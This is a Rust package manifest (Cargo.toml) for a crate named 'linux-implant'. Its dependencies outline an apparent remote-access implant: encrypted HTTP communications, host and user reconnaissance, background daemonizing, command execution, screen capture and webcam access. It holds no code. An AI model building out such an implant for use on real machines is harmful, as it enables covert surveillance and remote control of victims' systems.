[package]
name = "linux-implant"
version = "0.1.0"
edition = "2021"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
reqwest = { version = "0", features = ["blocking", "json", "multipart"] }
serde = { version = "1", features = ["derive"] }
x25519-dalek = "1"
blake3 = "1"
chacha20poly1305 = "0"
rand = { version = "0.7", features = ["getrandom"] }
base64 = "0"
thiserror = "1"
arrayvec = "0"
bincode = "1"
chrono = { version = "0", features = ["serde"] }
uuid = { version = "0.8.2", features = ["serde", "v4"] }
local-ip-address = "0"
users = "0"
gethostname = "0"
daemonize = "0"
execute = "0"
scrap = "0"
eye = "0.4.1"
